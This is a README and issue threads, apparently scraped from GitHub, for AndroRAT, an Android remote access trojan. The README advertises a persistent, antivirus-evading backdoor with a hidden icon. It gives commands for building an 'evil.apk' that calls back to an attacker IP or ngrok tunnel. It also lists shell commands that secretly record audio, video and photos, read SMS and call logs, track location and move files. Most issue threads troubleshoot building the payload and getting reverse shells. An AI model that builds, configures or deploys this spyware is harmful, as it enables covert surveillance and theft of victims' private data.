AndroRAT is a tool designed to give the control of the android system remotely and retrieve informations from it.

Overview

Disclaimer : This software is meant for educational purposes only. I'm not responsible for any malicious use of the app.

AndroRAT

MIT License Twitter Follow GitHub followers

AndroRAT is a tool designed to give the control of the android system remotely and retrieve informations from it. Androrat is a client/server application developed in Java Android for the client side and the Server is in Python.

AndroRAT will work on device from Android 4.1 (Jelly Bean) to Android 9.0 (Oreo) (API 16 to API 28)

AndroRAT also works on Android 10 (Q) but some of the interpreter command will be unstable.

Screenshots

AndroRAT

Features of AndroRAT

  • Full persistent backdoor
  • Fully undetectable by any antivirus scanner VirusTotal
  • Invisible icon on install
  • Light weight apk which runs 24*7 in background
  • App starts automatically on boot up
  • Can record audio, video, take picture from both camera
  • Browse call logs and SMS logs
  • Get current location, sim card details ,ip, mac address of the device

Prerequisites

AndroRAT requires Python3 and JAVA (or Android Studio)

Installation

git clone https://github.com/karma9874/AndroRAT.git
cd AndroRAT
pip install -r requirements.txt

Note:

While cloning the repository using Git bash on Windows, you may get the following error:

error: unable to create file : Filename too long

This is because the Git has a limit of 4096 characters for a filename, except on Windows when Git is compiled with msys. It uses an older version of the Windows API and there's a limit of 260 characters for a filename.

You can circumvent this by setting core.longpaths to true.

git config --system core.longpaths true

You must run Git bash with administrator privileges.

Usage (Windows and Linux)

  • To get the control panel of the app dial *#*#1337#*#* (For now it has only two options Restart Activity and Uninstall)

Note: In order to use this feature in some devices you need to enable the option display pop-up windows running in background from the settings.

Available Modes

  • --build - for building the android apk
  • --ngrok - for using ngrok tunnel (over the internet)
  • --shell - getting an interactive shell of the device

build mode

Usage:
  python3 androRAT.py --build --ngrok [flags]
  Flags:
    -p, --port              Attacker port number (optional by default its set to 8000)
    -o, --output            Name for the apk file (optional by default its set to "karma.apk")
    -icon, --icon           Visible icon after installing apk (by default set to hidden)
Usage:
  python3 androRAT.py --build [flags]
  Flags:
    -i, --ip                Attacker IP address (required)
    -p, --port              Attacker port number (required)
    -o, --output            Name for the apk file (optional)
    -icon, --icon           Visible icon after installing apk (by default set to hidden)

Or you can manually build the apk by importing Android Code folder to Android Studio and changing the IP address and port number in config.java file and then you can generate the signed apk from Android Studio -> Build -> Generate Signed APK(s)

shell mode

Usage:
  python3 androRAT.py --shell [flags]
  Flags:
    -i, --ip                Listner IP address
    -p, --port              Listner port number

After running the shell mode you will get an interpreter of the device

Commands which can run on the interpreter

    deviceInfo                 --> returns basic info of the device
    camList                    --> returns cameraID  
    takepic [cameraID]         --> Takes picture from camera
    startVideo [cameraID]      --> starts recording the video
    stopVideo                  --> stop recording the video and return the video file
    startAudio                 --> starts recording the audio
    stopAudio                  --> stop recording the audio
    getSMS [inbox|sent]        --> returns inbox sms or sent sms in a file 
    getCallLogs                --> returns call logs in a file
    shell                      --> starts a sh shell of the device
    vibrate [number_of_times]  --> vibrate the device number of time
    getLocation                --> return the current location of the device
    getIP                      --> returns the ip of the device
    getSimDetails              --> returns the details of all sim of the device
    clear                      --> clears the screen
    getClipData                --> return the current saved text from the clipboard
    getMACAddress              --> returns the mac address of the device
    exit                       --> exit the interpreter

In the sh shell there are some sub commands

    get [full_file_path]        --> donwloads the file to the local machine (file size upto 15mb)
    put [filename]              --> uploads the file to the android device

Examples

  • To build the apk using ngrok which will also set the listner: python3 androRAT.py --build --ngrok -o evil.apk

  • To build the apk using desired ip and port: python3 androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk

  • To get the interpreter: python3 androRAT.py --shell -i 0.0.0.0 -p 8000

Interpreter Examples

  • Generating APK

------------------------------------------------------------------------------------------------------------------------------
  • Some interpreter Commands

------------------------------------------------------------------------------------------------------------------------------

Supporters:

rayep

TODO

  • Ngrok support
  • Set up multi client
  • Add screenshot command

License

AndroRAT is licensed under MIT license take a look at the LICENSE for more information.

Comments
  • WindowsApps Permission Denied, can't build

    WindowsApps Permission Denied, can't build

    I installed python from Microsoft App Store. I'm getting this error below when I execute it ! FYI, I ran Git BASH as Administrator but still same error occured. How to fix? Please help

    python androRAT.py --build --ngrok -o evil.apk bash: /c/Users/Kas/AppData/Local/Microsoft/WindowsApps/python: Permission denied

    opened by baobao21 12
  • Exception in thread

    Exception in thread "main" java.lang.NoClassDefFoundError: sun/misc/BASE64Encoder

    when I try to install i get this error and I cant clear it : i used latest version of java

    Exception in thread "main" java.lang.NoClassDefFoundError: sun/misc/BASE64Encoder at s.Sign.addDigestsToManifest(Sign.java:108) at s.Sign.sign(Sign.java:454) at s.Sign.main(Sign.java:532) Caused by: java.lang.ClassNotFoundException: sun.misc.BASE64Encoder at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:581) at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:178) at java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:522) ... 3 more

    opened by Subass21 10
  • not able to use portmap io

    not able to use portmap io

    how to config ports? eg:python androRAT.py --build -i 192.169.x.x -p 8000 -o evil.apk

    my portmap.io is: tcp://DarkNotch-49754.portmap.host:49754 => 8989

    how should i config the ports is it

    python androRAT.py --build -i 193.161.193.99 -p 49754 -o evil.apk

    or python androRAT.py --build -i 193.161.193.99 -p 8989 -o evil.apk

    and how should i listen to the connection? python androRAT.py --shell -i 193.161.193.99 -p 49754 or python androRAT.py --shell -i 193.161.193.99 -p 8989

    opened by vipuluthaiah 9
  • why it is hanged on waiting for connection

    why it is hanged on waiting for connection

    i have build apk in build mode installed that app in my android device now i m in shell mode but it is not getting connection from that android device.

    opened by roshisuthar 9
  • Behavior of the new RAT build.

    Behavior of the new RAT build.

    Hello @karma9874,

    Thank you for adding the foreground service! :)

    I have built a new APK with modified changes (foreground svc enhancement). Installed it in my Android 9 (Moto G6) mobile, and started to test the setup. After opening the RAT, got the reverse shell as expected, executed commands, all looks good (mobile unlocked at this point).

    Manually disabled notifications, battery optimizations to ensure that the RAT functionality not be affected by those settings.

    Now, I did notice the dim backlight behavior is still present i.e. screen did not get turned off completely instead it keeps the display on (dim) after crossing the config screen-off time (15 seconds in my case). So, I force locked the mobile and still the reverse shell is up and running, executed commands like takePic and startVideo, commands got executed successfully when the mobile is locked 😊 though it has some delay, it's absolutely fine to wait for some extra seconds...!

    Sometimes, I do see RAT just stops working like there's no screen flicker when conn./disconn. to internet, no reverse shell, no display dim (mobile gets locked after 15 seconds). In that case, do we have any auto-restart logic or some kind of functionality to start the RAT service again?

    To make it work again, I would need to reboot the mobile!!!

    Thanks for your help!

    opened by rayep 8
  • Error with APK Build files?

    Error with APK Build files?

    Unsure how active you're all currently! Here is an error I run into whenever building a client, any clues?

    D:\fauly\dev\opsec\AndroRAT>python androRAT.py --build -i 192.168.1.236 -p 8000 -o evil.apk Generating apk file W: fakeLogOpen(/dev/log_stats) failed W: D:\fauly\dev\opsec\AndroRAT\Compiled_apk_files\res\values-v26\styles.xml:14: error: Error: No resource found that matches the given name: attr 'android:keyboardNavigationCluster'. W: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [C:\Users\fauly\AppData\Local\Temp\brut_util_Jar_4991560649033101140.tmp, p, --forced-package-id, 127, --min-sdk-version, 16, --target-sdk-version, 22, --version-code, 1, --version-name, 1.0, --no-version-vectors, -F, C:\Users\fauly\AppData\Local\Temp\APKTOOL3942104992599574233.tmp, -e, C:\Users\fauly\AppData\Local\Temp\APKTOOL7164257222819156857.tmp, -0, arsc, -I, C:\Users\fauly\AppData\Local\apktool\framework\1.apk, -S, D:\fauly\dev\opsec\AndroRAT\Compiled_apk_files\res, -M, D:\fauly\dev\opsec\AndroRAT\Compiled_apk_files\AndroidManifest.xml] Building Failed

    opened by fauly 8
  • ModuleNotFoundError: No module named 'colorama'

    ModuleNotFoundError: No module named 'colorama'

    ┌──(root💀kali)-[~/Desktop/AndroRAT] └─# python3 androRAT.py -h
    Traceback (most recent call last): File "/root/Desktop/AndroRAT/androRAT.py", line 4, in from utils import * File "/root/Desktop/AndroRAT/utils.py", line 14, in from colorama import Fore, Style,init ModuleNotFoundError: No module named 'colorama'

    ┌──(root💀kali)-[~/Desktop/AndroRAT] └─# pip install -r requirements.txt Requirement already satisfied: colorama_ in /usr/local/lib/python3.9/dist-packages (from -r requirements.txt (line 1)) (0.4.4) Requirement already satisfied: pyngrok in /usr/local/lib/python3.9/dist-packages (from -r requirements.txt (line 2)) (5.1.0) Requirement already satisfied: PyYAML in /usr/lib/python3/dist-packages (from pyngrok->-r requirements.txt (line 2)) (5.4.1)


    please help for this error,thanks in advance

    opened by santoshdawre 7
  • Issues with video record size and flicker screen

    Issues with video record size and flicker screen

    Hello There,

    Is there a recording limit/size limit for the video record sessions? I'm able to capture only upto 14MB (~18 secs) worth of video record. If I cross 20 secs, then I will get the below error message.

    Interpreter:/> startVideo 1
    Started Recording Video
    
    Interpreter:/> stopVideo
    Large file cant transfer
    END123
    

    Another interesting issue that the mobile screen is stable (with RAT installed) as long as Internet is connected (WiFi) i.e., whenever I turn off the Internet connection, the mobile screen starts to flicker. Connecting back to Internet makes the flicker to stop.

    Tried disabling the battery optimizations, draw over other apps, all notifications settings, however still the same.

    Both issues are replicable on-demand in my Moto G(6) running Android 9 and C&C server is Ubuntu 20.04.

    Thank you, Ray.

    opened by rayep 7
  • 'Thread' object has no attribute 'isAlive'

    'Thread' object has no attribute 'isAlive'

    I cant figure out why I'm getting this error. I have compiled the apk using android studio and installed in my android . and then I run the python server program,then I get this....can someone help me to solve this....???

    Traceback (most recent call last):
      File "C:\Users\ahmed\Desktop\AndroRAT-master\androRAT.py", line 45, in <module>
        get_shell(args.ip,args.port)
      File "C:\Users\ahmed\Desktop\AndroRAT-master\utils.py", line 310, in get_shell
        while t.isAlive(): animate("Waiting for Connections  ")
    AttributeError: 'Thread' object has no attribute 'isAlive'
    
    opened by rubelliumm 7
  • I cannot open the shell

    I cannot open the shell

    It shows the following error when i try to open the shell

    Traceback (most recent call last):

    File "androRAT.py", line 53, in

    soc.bind((ip, port))
    

    OSError: [Errno 99] Cannot assign requested address

    I am using java 8

    opened by hackersploitaayush 7
  • Connection reset by peer

    Connection reset by peer

    Hi, I use your program and I have an issue. I build an apk and my apk file name is system.apk. I installed this apk a Samsung device and it works only 2-3 minutes. When 2-3 minutes later I see this error and my connection is lost.

    android@shell:~$ cd .. Traceback (most recent call last): File "androRAT.py", line 75, in shell(conn) File "/root/RAT/utils.py", line 129, in shell msg = recvallShell(client) File "/root/RAT/utils.py", line 192, in recvallShell data = sock.recv(4096).decode("UTF-8","ignore") ConnectionResetError: [Errno 104] Connection reset by peer

    How can I figure this?

    Note: The device running and device have an internet connection.

    bug 
    opened by erkankyn1 6
  • File vanished

    File vanished

    Please the file vanished from my system and I can not find it but when I search ls on my Linux through my terminal I see the directory note I connect the Linux via SSH from my Aws instance But the folder was installed directly on my Mac

    opened by anonymouslyblack 0
  • Javac: invalid flag: -jar

    Javac: invalid flag: -jar

    ┌──(kali㉿Mercury)-[~/Desktop/AndroRAT] └─$ python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk [INFO] Tunnel_IP: 3.13.191.225 PORT: 15064 [INFO] Generating APK [INFO] Building APK | javac: invalid flag: -jar Usage: javac use -help for a list of possible options

    [ERROR] Building Failed

    Plss help me out with this problem...

    opened by Promaus0 0
  • Error in takepic

    Error in takepic

    Hi Sir, I am just testing this script on my local android phone, apk installed perfactely on my phone but while taking pic its showing error (unable to connect to the camera)

    Interpreter:/> camList [ERROR] Unknown Command

    Interpreter:/> camList 0 -- Back Camera 1 -- Front Camera 2 -- Front Camera

    Interpreter:/> takepic 0
    [INFO] Taking Image [ERROR] Unable to connect to the Camera

    opened by jonybeep 0
Owner
Neeraj Singh
Hey there! I am using Github.
Neeraj Singh
Beautifully designed Pokémon Database app for Android based on PokéAPI and powered by Kotlin.

PokéFacts PokéFacts is an open-source Pokémon Database app for Android based on PokéAPI and powered by Kotlin. The app allows users to view Pokémons,

Arjun Mehta 9 Oct 22, 2022
Lightweight compiler plugin intended for Kotlin/JVM library development and symbol visibility control.

Restrikt A Kotlin/JVM compiler plugin to restrict symbols access, from external project sources. This plugin offers two ways to hide symbols: An autom

Lorris Creantor 18 Nov 24, 2022
KaMP Kit by Touchlab is a collection of code and tools designed to get your mobile team started quickly with Kotlin Multiplatform.

KaMP Kit Welcome to the KaMP Kit! About Goal The goal of the KaMP Kit is to facilitate your evaluation of Kotlin Multiplatform (aka KMP). It is a coll

Touchlab 1.7k Jan 3, 2023
NewsAppKt is an Android app designed for searching news using TheGuardianOpenPlatform public web service.

NewsAppKt is an updated version of NewsApp. It is written entirely in Kotlin and uses MVVM with Clean Architecture practices. The UI implementation uses Jetpack Compose.

Daniel Bedoya 2 Sep 22, 2022
Animated tabbar with native control

SSCustomBottomNavigation Getting Started SSCustomBottomNavigation is a customizable bottom bar library with curved animations. The actual features are

Simform Solutions 363 Dec 30, 2022
Use Flink's Stateful Functions as a control-plane technology for operating a streaming-platform

statefun-ops Use ?? Flink Stateful Functions as a control-plane technology for operating a streaming-platform based on Apache Kafka. Walkthrough Ensur

Dylan Meissner 8 Oct 1, 2022
A simple xposed module that helps you fully control your location.

FuckLocation An simple xposed module that helps you fully control your location. 一个可以帮助你完全控制位置授权的模块 Currently, you may return custom location to speci

null 218 Dec 30, 2022
Parking Robot based on 3D LiDAR. Keywords: Automatic Parking, SLAM, 3D Navigation, Remote Control, ROS, RRT

ELEC3875-Final-Project My undergraduate final project: Parking Robot based on 3D LiDAR. ELEC3875 / XJEL3875 Keywords: Automatic Parking, SLAM, 3D Navi

Hugo Hu 6 Oct 1, 2022
A high-performance fork of Paper/Airplane designed for large servers.

Pufferfish A highly optimized Paper/Airplane fork designed for large servers requiring both maximum performance, stability, and "enterprise" features.

Pufferfish Studios LLC 399 Jan 7, 2023
Minecraft Server Software specially designed for Thicc SMP. Here on GitHub without the private patches, just a normal hybrid JettPack-Pufferfish-Empirecraft fork

AlynaaMC A private, custom server software for Thicc SMP and a fork of Pufferfish. Here on GitHub with patches from JettPack, Airplane and Pufferfish

ThiccMC 14 Dec 31, 2021
Elixir is a library designed to make minecraft login easier.

Elixir Elixir is a library designed to make minecraft login easier. Usage We have a maven repo for this project. repositories { maven { url = "htt

null 4 Aug 11, 2022
WolfxPaper - A Paper fork designed for Wolfx Survial, may useful for some Semi-Vanilla Server

WolfxPaper A Paper fork designed for Wolfx Survial, may useful for some "Semi-Va

TenkyuChimata 1 Jan 19, 2022
Reapp is everything you need to build amazing apps with React: a collection of packages that work together, our UI kit, and a CLI that scaffolds your app and includes a server and build system.

What is it? Reapp is everything you need to build amazing apps with React: a collection of packages that work together, our UI kit, and a CLI that sca

reapp 3.4k Nov 20, 2022
Kotlin DALL·E 2 is a new AI system that can create realistic images and art from a description in natural language.

OpenAI Dall•E AI Kotlin Mobile App OpenAI Dall•E Application Build With Kotlin MVVM (Model - View - ViewModel) Clean Architecture, Beautiful Design UI

Murat ÖZTÜRK 15 Jan 1, 2023
🔓 Kotlin version of the popular google/easypermissions wrapper library to simplify basic system permissions logic on Android M or higher.

EasyPermissions-ktx Kotlin version of the popular googlesample/easypermissions wrapper library to simplify basic system permissions logic on Android M

Madalin Valceleanu 326 Dec 23, 2022
Celebrate more with this lightweight confetti particle system 🎊

Konfetti ?? ?? Celebrate more with this lightweight confetti particle system. Create realistic confetti by implementing this easy to use library. Demo

Dion Segijn 2.7k Dec 28, 2022
Spigot-Plugin message providing system written in Kotlin

teller Spigot-Plugin message providing system written in Kotlin Usage Create an instance of PropertiesMessageProvider using the Constructor with an in

Luca Zieserl 2 Jan 16, 2022
A fast, lightweight, entity component system library written in Kotlin.

Fleks A fast, lightweight, entity component system library written in Kotlin. Motivation When developing my hobby games using LibGDX, I always used As

Simon 66 Dec 28, 2022
🚧 General-Purpose Module System for Kotlin.

?? Modules: General-Purpose Module System A module system & loader for Kotlin. Made for me to use. Architecture Module is a building block for this sy

lhwdev 0 Dec 29, 2021